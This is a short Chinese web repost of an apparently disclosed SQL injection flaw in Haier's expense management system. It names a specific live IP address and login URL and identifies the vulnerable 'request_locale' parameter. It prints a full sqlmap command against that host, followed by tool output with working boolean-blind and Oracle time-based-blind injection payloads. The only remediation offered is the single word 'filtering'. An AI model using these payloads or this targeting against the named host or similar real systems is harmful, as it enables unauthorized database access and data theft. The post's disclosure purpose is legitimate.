欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

海尔集团费用管理系统存在SQL注入漏洞

程序员文章站 2022-04-07 09:53:15
海尔集团费用管理系统存在SQL注入漏洞 # 漏洞网站 海尔全球费用管理系统 http://27.223.70.16:443/gems/security/loginInit.action...

海尔集团费用管理系统存在SQL注入漏洞

# 漏洞网站 海尔全球费用管理系统

http://27.223.70.16:443/gems/security/loginInit.action

# 注入点

http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US

# 注入参数

request_locale

python sqlmap.py -u "http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US'" --dbms oracle
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: request_locale (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: request_locale=en_US' AND 1286=1286-- qGIA

Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: request_locale=en_US' AND 2334=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(75)||CHR(116)||CHR(66),5)-- BIBG

---

[19:44:44] [INFO] the back-end DBMS is Oracle

web application technology: Nginx

back-end DBMS: Oracle

解决方案:

过滤